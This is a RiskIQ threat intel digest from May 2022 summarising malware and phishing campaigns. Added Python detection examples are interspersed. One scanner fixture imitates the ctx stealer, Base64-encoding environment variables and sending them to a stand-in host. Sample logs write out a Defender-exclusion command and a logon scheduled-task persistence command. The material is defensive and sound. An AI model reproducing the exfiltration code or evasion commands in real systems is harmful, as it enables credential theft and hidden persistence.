RiskIQ Updates May 30, 2022



PassiveTotal Threat Intel Digest


This digest highlights OSINT and original research that RiskIQ has gathered and enriched weekly.


RiskIQ: EUROPIUM uses Saitama backdoor, targets Jordan Government

EUROPIUM, an Iranian APT also referred to as APT34 and OilRig, has actively been targeting Jordan’s Foreign Ministry with a document-themed phishing campaign. The campaign distributes a malicious Excel file and uses the Saitama backdoor, a new tool not previously seen in use by EUROPIUM.

RiskIQ Backdoor Saitama APT APT34 EUROPIUM OilRig Iran Jordan

12 Indicators      8 Public      4 RiskIQ


RiskIQ: Magecart Injected URLs and C2 Domains, May 20-27, 2022

Between 20 and 27 May 2022, RiskIQ detected 299 Magecart and skimmer injected URLs and 76 unique C2 domains used by known Magecart threat actors. Note that many of these URLs are legitimate, compromised websites: the full URL should be considered, and the domain itself is not necessarily malicious. Also note, when establishing current maliciousness, that some C2 domains may themselves be compromised, legitimate domains. See RiskIQ's most recent reporting on Magecart in the references.

RiskIQ MageCart Skimmer JavaScript

375 Indicators      0 Public      375 RiskIQ


Grandoreiro Banking Malware Resurfaces

Trustwave SpiderLabs in early April observed a Grandoreiro malware campaign targeting bank users from Brazil, Spain, and Mexico. The campaign exploits the tax season in target countries by sending out tax-themed phishing emails.

TrustWave Malware Grandoreiro DllHijacking Phishing

9 Indicators      9 Public     


RiskIQ: Files with Image Extensions Hosted on Discord's CDN Drop Smoke Loader

RiskIQ reviewed malicious files that were hosted on Discord's Content Delivery Network that ended in various image file extensions (.jpeg, .jpg, .bmp, .png, and .gif). We keyed in on a few samples that used URL shortening services to forward to the Discord URL hosting the image file. One set of activity noted was five different image files that all loaded up the same executable which was identified as Smoke Loader. No detailed analysis has been conducted on the Smoke Loader file, but it is noted that according to the Hybrid Analysis Sandbox, the Smoke Loader file reads terminal service related keys: "TSUSERENABLED" and "TSAPPCOMPAT". The file was also packed with "Safeguard v1.03 -> Simonzh".

RiskIQ Malware SmokeLoader

35 Indicators      35 Public     


RiskIQ: GootKit Payload Delivery URLs, May 25, 2022

Between 18 and 24 May 2022, RiskIQ detected five fake forum pages containing a link to the GootKit payload delivery URL. Note that these are legitimate, compromised websites, so the full URL should be considered and the domain itself is not necessarily malicious.

RiskIQ GootKit

10 Indicators      10 Public     


Python Package ‘pykafka’ TypoSquatting Attack Targets macOS & Linux

Researchers from Sonatype reported on a supply chain attack via a malicious Python package ‘pymafka’ that was uploaded to the popular PyPI registry. The package attempted to infect users by means of typosquatting: hoping that victims looking for the legitimate ‘pykafka’ package might mistype the query and download the malware instead. Depending on whether the victim is running Windows, macOS, or Linux, a matching malicious trojan is downloaded and executed on the infected system. The trojan dropped in this attack is a Cobalt Strike (CS) beacon.

macOS SupplyChain TypoSquatting CobaltStrike Linux Python Sonatype SentinelOne

9 Indicators      9 Public     
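
The typosquatting described in the pymafka entry above works because a registry lookup either matches a name exactly or returns nothing. The following is an added example, not code from Sonatype or from the page, showing the pre-install check a defender can put in front of `pip`: normalise the requested name the way PyPI does (PEP 503), then measure its edit distance to an allowlist of vetted packages and hold anything that is not known but is within a couple of edits of a known name. The allowlist `KNOWN_PACKAGES` and the candidate names are constructed for the example.

```python
import re

# Constructed allowlist of packages an organisation has already vetted;
# it stands in for a real internal index or a list pulled from the registry.
KNOWN_PACKAGES = {"pykafka", "requests", "numpy", "urllib3", "cryptography"}


def normalise(name: str) -> str:
    """PEP 503 name normalisation: lower-case, runs of '-', '_' and '.' become '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Edit distance with single-character insert, delete and substitute."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete ca
                           cur[j - 1] + 1,             # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute ca with cb
        prev = cur
    return prev[-1]


def typosquat_check(name: str, known=KNOWN_PACKAGES, max_distance: int = 2) -> dict:
    """Classify a requested package name against the allowlist.

    'known'      : exact match after normalisation, safe to install.
    'suspicious' : not known, but within max_distance edits of a known name
                   (the pymafka / pykafka case); hold the install for review.
    'unknown'    : not known and not close to anything; needs normal vetting.
    """
    target = normalise(name)
    known_norm = {normalise(k) for k in known}
    if target in known_norm:
        return {"name": name, "verdict": "known", "near": []}
    near = sorted((levenshtein(target, k), k) for k in known_norm)
    near = [(d, k) for d, k in near if d <= max_distance]
    return {"name": name, "verdict": "suspicious" if near else "unknown", "near": near}


if __name__ == "__main__":
    for candidate in ("pymafka", "PyKafka", "requets", "flask"):
        print(typosquat_check(candidate))
```

The distance threshold of two is deliberately small: one substitution (`pymafka`) or one dropped letter (`requets`) is the typical typosquat, while a genuinely new package name usually differs from everything on the allowlist by far more.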


Saitama backdoor and DNS tunnelling

Malware with the intent of surveillance or espionage needs to operate undetected, but the chances are it also needs to exfiltrate data or exchange messages with its command and control infrastructure, both of which could reveal its presence to threat hunters. Saitama avoids detection by using DNS tunnelling, which hides messages inside ordinary-looking DNS requests. This article expands on the tricks that Saitama used to keep its DNS tunnelling hidden.

DNS-Tunneling Malware APT34 Malwarebytes

5 Indicators      5 Public     
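
DNS tunnelling of the kind the Saitama entry above describes leaves a statistical footprint even when each individual query looks plausible: the encoded data has to go into subdomain labels, so one zone receives many queries whose leftmost labels are long, high-entropy and almost never repeated. The following is an added example, not code from Malwarebytes or from the page, of a resolver-log heuristic built on those three properties. The log format (`timestamp client qtype qname`), the zone `update-check.test` and all query names are constructed for the example; the thresholds are starting points to tune against your own baseline, not values taken from the article.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log, one query per line: timestamp, client, qtype, qname.
# example.com traffic is ordinary; update-check.test carries a tunnel-like pattern.
SAMPLE_LOG = """\
2022-05-25T09:00:01Z 10.0.0.5 A www.example.com
2022-05-25T09:00:02Z 10.0.0.5 A mail.example.com
2022-05-25T09:00:03Z 10.0.0.5 A www.example.com
2022-05-25T09:00:04Z 10.0.0.7 A 7a3fc19e2b8d4f60c1e5a9b2.update-check.test
2022-05-25T09:00:05Z 10.0.0.7 A e91b0c4d7f23a8b5d6c0f1e4.update-check.test
2022-05-25T09:00:06Z 10.0.0.7 A 4c8d2e6f0a1b3c5d7e9f8a6b.update-check.test
2022-05-25T09:00:07Z 10.0.0.7 A b2d4f6a8c0e1d3f5a7b9c1d3.update-check.test
2022-05-25T09:00:08Z 10.0.0.7 A 0f1e2d3c4b5a69788796a5b4.update-check.test
2022-05-25T09:00:09Z 10.0.0.5 A cdn.example.com
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qtype>\S+)\s+(?P<qname>\S+)$")


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; hex or base32 payloads score well above words."""
    if not s:
        return 0.0
    freq = defaultdict(int)
    for ch in s:
        freq[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in freq.values())


def split_name(qname: str):
    """Split into (zone, subdomain). The zone is the last two labels; this ignores
    public-suffix rules (co.uk etc.) to keep the example dependency-free."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyse(log_text: str, min_queries=3, min_len=20, min_entropy=3.0, min_unique_ratio=0.9):
    """Return {zone: stats} for zones whose subdomains look like a data channel."""
    stats = defaultdict(lambda: {"total": 0, "subs": set(), "len_sum": 0, "ent_sum": 0.0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        zone, sub = split_name(m["qname"])
        st = stats[zone]
        st["total"] += 1
        if sub:
            st["subs"].add(sub)
            st["len_sum"] += len(sub)
            st["ent_sum"] += shannon_entropy(sub.replace(".", ""))
    findings = {}
    for zone, st in stats.items():
        n = st["total"]
        if n < min_queries or not st["subs"]:
            continue
        avg_len = st["len_sum"] / n          # long labels: payload capacity
        avg_ent = st["ent_sum"] / n          # high entropy: encoded, not words
        uniq = len(st["subs"]) / n           # rarely repeated: defeats caching
        if avg_len >= min_len and avg_ent >= min_entropy and uniq >= min_unique_ratio:
            findings[zone] = {"queries": n, "avg_label_len": round(avg_len, 1),
                              "avg_entropy": round(avg_ent, 2), "unique_ratio": round(uniq, 2)}
    return findings


if __name__ == "__main__":
    for zone, info in analyse(SAMPLE_LOG).items():
        print(zone, info)
```

All three conditions have to hold together: CDNs and anti-spam services also generate many unique subdomains, but their labels are usually shorter or lower-entropy, which is why a single feature on its own produces too many false positives.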


Unknown APT Group Targets Russia with Phishing Campaigns

Since February, an unknown APT group has launched at least four spear-phishing campaigns against Russian targets using a variety of lures. Attribution is difficult, and threat actors are known to use indicators from other groups as false flags. The attribution of the APT behind these campaigns is ongoing, but based on the infrastructure used, Malwarebytes assesses with low confidence that this group is a Chinese actor. In the article below, the Malwarebytes researchers reveal the tactics and techniques used by the threat actors and provide a technical analysis of the observed malicious stages and payloads.

Phishing NewAPT Spoofing Russia Ukraine TypoSquatting

56 Indicators      56 Public     


ctx Python Library Updated with "Extra" Features

Python package ctx was compromised on May 14th, 2022. The package had last been uploaded to pypi.org on December 19, 2014, so recent version updates that seemed identical to the original raised red flags for Reddit user u/jimtk. A check of the ctx author’s GitHub repository showed that the ctx package should not have received any recent updates. In the “new” ctx version 0.1.2, code was added that attempts to retrieve the AWS access key ID, the computer name and the AWS secret access key whenever a dictionary is created. Further compromised versions attempted to obtain all environment variables, encode them in Base64, and forward the data to a web app under the perpetrator’s control. PHP's phpass saw similar version updates containing the same type of malicious code. The compromise of hautepass/phpass has been attributed to the attacker claiming a previously abandoned GitHub repository and reviving it to publish altered 'phpass' versions to the Packagist registry. Given that the malware was injected about a week ago, only users who installed these packages in the past week have been affected. Malicious versions to date:

- The “new” ctx version 0.1.2 as of May 14th, 2022
- ctx version 0.2.2
- ctx version 0.2.6
- PHP library phpass as of May 14th, 2022

ctx PyPi Python PHP phpass CodeInjection

4 Indicators      4 Public     
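
The ctx entry above describes the classic shape of an injected credential stealer: read the environment, encode it, send it to a web endpoint. The following is an added example, not code from the page, from the ctx project or from the researchers who reported it, showing how a defender can scan a downloaded package's source for that combination before installing it. It walks the Python AST rather than grepping text, so it is not fooled by spacing or comments, and it only escalates to "high" when an environment read and a network call appear in the same module. The two sample modules are constructed for the example; `SUSPICIOUS_SAMPLE` imitates the behaviour described in the entry and is not the real ctx code.

```python
import ast

# Calls or attributes that read the process environment.
ENV_SOURCES = {"os.environ", "os.environ.get", "os.getenv", "os.environb"}
# Encoders commonly used to wrap collected data before sending it.
ENCODERS = {"base64.b64encode", "base64.urlsafe_b64encode", "base64.b32encode"}
# Functions that move data off the host.
NET_SINKS = {"urllib.request.urlopen", "urlopen", "requests.post", "requests.get",
             "http.client.HTTPSConnection", "http.client.HTTPConnection", "socket.socket"}

# Constructed sample resembling the behaviour described for the altered ctx
# release (not the real package code): collect the environment, encode, send.
SUSPICIOUS_SAMPLE = '''
import os
import base64
from urllib.request import urlopen

class Ctx(dict):
    def __init__(self):
        super().__init__()
        payload = base64.b64encode(str(dict(os.environ)).encode())
        urlopen("https://collector.invalid/?d=" + payload.decode())
'''

# Constructed benign sample: reads one setting from the environment, no network.
BENIGN_SAMPLE = '''
import os
DEBUG = os.getenv("APP_DEBUG", "0") == "1"
'''


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else
    (calls on call results, subscripts, etc. are not resolved)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(src: str) -> dict:
    """Static scan of one module's source for the env-read + network-send pattern.
    Import aliases (import os as o) are not followed; a production scanner would
    resolve them from the module's import statements."""
    hits = {"env": set(), "encode": set(), "net": set()}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
        elif isinstance(node, ast.Attribute):
            name = dotted_name(node)
        else:
            continue
        if name is None:
            continue
        if name in ENV_SOURCES:
            hits["env"].add(name)
        if name in ENCODERS:
            hits["encode"].add(name)
        if name in NET_SINKS:
            hits["net"].add(name)
    if hits["env"] and hits["net"]:
        severity = "high"      # reads secrets AND can send them out
    elif hits["env"] or hits["net"]:
        severity = "low"       # one half of the pattern; common in benign code
    else:
        severity = "none"
    return {"severity": severity, **{k: sorted(v) for k, v in hits.items()}}


if __name__ == "__main__":
    print("suspicious:", scan_source(SUSPICIOUS_SAMPLE))
    print("benign:    ", scan_source(BENIGN_SAMPLE))
```

Run this over every `.py` file in the extracted sdist or wheel and treat a "high" result as a reason to diff the release against the project's source repository, which is exactly the check that exposed ctx: the upstream repository had no corresponding commit.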


New Nokoyawa Ransomware Variant with Blatant Code Reuse

FortiGuard Labs discovered a new variant of the Nokoyawa ransomware and observed it reusing code from publicly available sources. Unlike its alleged ransomware predecessor, Karma, FortiGuard Labs has only observed samples of Nokoyawa compiled to run on 64-bit Windows.

Ransomware Nokoyawa CobaltStrike

19 Indicators      19 Public     


GuLoader Dropped in New 'Energy Market' Themed Phishing Campaign

Given the current fluctuations in the energy market and the related rise in prices to consumers, it should be no surprise that threat actors are using lures to exploit the global interest in this issue. FortiGuard Labs recently discovered an e-mail using this tactic. The message was delivered to a coffee company in Ukraine that was seemingly sent by an oil provider in Saudi Arabia. Purporting to be a purchase order, the partial PDF file image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained an executable for GuLoader. Also known as CloudEye and vbdropper, GuLoader dates to at least 2019 and is generally used to deploy other malware variants, such as Agent Tesla, Formbook, and Lokibot.

phishing GuLoader

4 Indicators      4 Public     


Metastealer New Information Stealer Variant

MetaStealer is a new information stealer variant designed to fill the void left by Raccoon stealer suspending operations in March of this year. Israeli intelligence firm Kela first identified its emergence on underground marketplaces. Significant findings include:

- Heavy reliance on open-source libraries
- Microsoft Defender bypass
- Scheduled task persistence
- Password stealer
- Keylogger
- Hidden VNC server

It is currently seen distributed via phishing as Excel attachments. Early in execution, a PowerShell command adds an exclusion rule to Microsoft Defender, effectively turning off scanning of files with the ‘.exe’ extension. This decreases the chances of the main payload being detected, as well as any subsequent payloads that may be delivered to the target host post-infection. To maintain persistence, a scheduled task is created to trigger at user login, ensuring the malware survives reboots.

MetaStealer Keylogger PowerShell Malware PasswordStealer Phishing Macros Excel

21 Indicators      19 Public      2 RiskIQ
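
Both behaviours in the MetaStealer entry above, the Defender exclusion and the logon-triggered scheduled task, run through PowerShell and are therefore visible in Windows Script Block Logging (Event ID 4104) when it is enabled. The following is an added example, not code from the page or from the MetaStealer analysis, of two detection rules run over such log lines and a per-host triage that raises the verdict when evasion and persistence appear on the same machine. The log line layout (`timestamp host eventid script`), the host names and the script text are constructed for the example; the cmdlet and `schtasks` switches the patterns look for are the real ones.

```python
import re
from collections import defaultdict

# Constructed script-block log lines: "<timestamp> <host> <event id> <script text>".
# Event ID 4104 is the real Windows Script Block Logging event; the hosts and
# commands are made up for the example.
SAMPLE_EVENTS = r"""
2022-05-26T14:02:11Z HOST01 4104 Add-MpPreference -ExclusionExtension ".exe"
2022-05-26T14:02:12Z HOST01 4104 schtasks /create /tn "SystemUpdater" /sc onlogon /tr "C:\Users\Public\updater.exe"
2022-05-26T14:03:00Z HOST02 4104 Get-ChildItem C:\Temp -Recurse | Remove-Item -Force
2022-05-26T14:05:30Z HOST03 4104 Register-ScheduledTask -TaskName Sync -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Action $a
"""

EVENT_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<eid>\d+)\s+(?P<script>.*)$")

# (rule name, tactic, pattern). Case-insensitive because PowerShell is.
RULES = [
    ("defender_exclusion_added", "defense-evasion",
     re.compile(r"Add-MpPreference\b.*-Exclusion(Extension|Path|Process)", re.I)),
    ("scheduled_task_at_logon", "persistence",
     re.compile(r"schtasks(\.exe)?\b.*/sc\s+onlogon|New-ScheduledTaskTrigger\b.*-AtLogOn", re.I)),
]


def match_events(log_text: str):
    """Return [(host, rule_name, tactic, script)] for every rule hit on a 4104 event."""
    hits = []
    for line in log_text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m or m["eid"] != "4104":
            continue
        for name, tactic, pat in RULES:
            if pat.search(m["script"]):
                hits.append((m["host"], name, tactic, m["script"]))
    return hits


def triage(log_text: str) -> dict:
    """Per-host verdict: 'high' when both defense-evasion and persistence were
    seen (the MetaStealer sequence), 'medium' for either one alone. Hosts with
    no hits are omitted."""
    tactics = defaultdict(set)
    for host, _name, tactic, _script in match_events(log_text):
        tactics[host].add(tactic)
    return {host: ("high" if {"defense-evasion", "persistence"} <= seen else "medium")
            for host, seen in tactics.items()}


if __name__ == "__main__":
    for hit in match_events(SAMPLE_EVENTS):
        print(hit)
    print(triage(SAMPLE_EVENTS))
```

Administrators do legitimately add Defender exclusions and logon tasks, so a single rule firing is only "medium"; the combination within a short window on one host, particularly shortly after an Office process spawned PowerShell, is what deserves an immediate look. Without Script Block Logging enabled, the same activity can still be found after the fact through `Get-MpPreference` (exclusion lists) and the Task Scheduler event log.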


Bumblebee Malware from TransferXL URLs

Last month, Google's Threat Analysis Group (TAG) reported on EXOTIC LILY using file transfer services like TransferNow, TransferXL, WeTransfer, or OneDrive to distribute malware. [Read More Here.](https://community.riskiq.com/article/41e23799/description) Using this information, Duncan found a handful of active TransferXL URLs delivering ISO files for Bumblebee malware.

Bumblebee Malware EXOTICLILY CobaltStrike FileSharing

16 Indicators      16 Public     

RiskIQ | 22 Battery Street, 10th Floor | San Francisco, CA 94111
© Copyright 2022 RiskIQ, Inc. All rights reserved.